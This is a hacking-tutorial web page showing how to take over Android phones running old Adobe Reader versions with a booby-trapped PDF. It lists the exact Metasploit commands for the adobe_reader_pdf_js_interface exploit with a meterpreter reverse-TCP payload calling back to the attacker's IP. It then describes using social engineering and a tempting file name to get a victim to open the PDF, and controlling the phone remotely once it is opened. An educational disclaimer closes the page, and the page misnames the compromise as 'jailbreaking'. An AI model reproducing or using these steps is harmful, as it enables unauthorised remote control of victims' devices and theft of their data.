How To Hack Android With PDF File ?

Hack Android With PDF

hack android with PDF file Please note that this is an old vulnerability that has been fixed and does not work on newer phones. But older phones are still vulnerable to this attack.

This tip works with Adobe Reader 11.2.0 and below on Android devices. This is a remote code execution vulnerability in Adobe Reader that could help us gain control of an Android device via a malicious PDF generated with Metasploit.

Adobe Reader Android version prior to 11.2.0 has a critical vulnerability that makes unprotected native interfaces unprotected to untrusted JavaScript inside a PDF file.

Also Read  What Is Security Code In WhatsApp ?

This hacker works by embedding an exploit from the android / webview_addjavascriptinterface browser exploit that we used in the previous article. This hack uses PDF as media to get command shell on Android devices with a vulnerable version of Adobe Reader.

Simply put, we are exploiting a vulnerability in Adobe Reader to exploit and hack an Android device, as well as run malicious Javascript code through the Adobe Reader interface.

Steps To Hack Android With PDF

Follow The Steps Below To Hack Android With PDF.

Also Read  How To Change Serial Number of an Android Device ?

Step – 1

Start your Kali Linux computer and open the Metasploit console to start jailbreaking Android with a pdf file.

Step – 2

To generate a malicious PDF file, enter the following commands in the MSF console:

use exploit/android/fileformat/adobe_reader_pdf_js_interface
set payload android/meterpreter/reverse_tcp
set lhost 192.168.192.166 (Your IP here)
set port 20068
exploit

Step – 3

Now that the malicious PDF is ready. Use social engineering to send a malicious PDF to the victim.

You can use any PDF editor to edit the file and add content to make it look more realistic.

Also Read  How to Hack an Android Phone ?

The folder path

/root/.msf4/local/eninja.pdf

Step – 4

In my case, this is a pdf file eninja.pdf, but you can always change the name to whatever the victim will click on.

Note – This attack only works on limited Android devices with vulnerable webview API and older versions of Adobe Reader.

As soon as the victim opens the malicious PDF, the Android phone will be jailbroken and we can access the shell on our Kali machine and you can control it remotely using the meterpreter shell. This is how easy it is to hack an Android device with a pdf file.

Here You Will Find All Kind OF Information Related To Cybersecurity, What Is Hacking, All Kind Of Hacking Attacks Informations. So That You Can Avoid Such Problemes. Which Says Precision Is Better Than Cure.


Warning ! ! !
All The Information Provided Here Is For Educational Purposes Only.
You Are Solely Responsible For What You Do With This Information.

Disclaimer ! ! !
We Don't Support Or Promote Any Illegal Activities.
Our Main Goal Is To Spread Awareness On CyberSecurity Among People.
So, That They Can Avoid Such Tragedy

Leave a Comment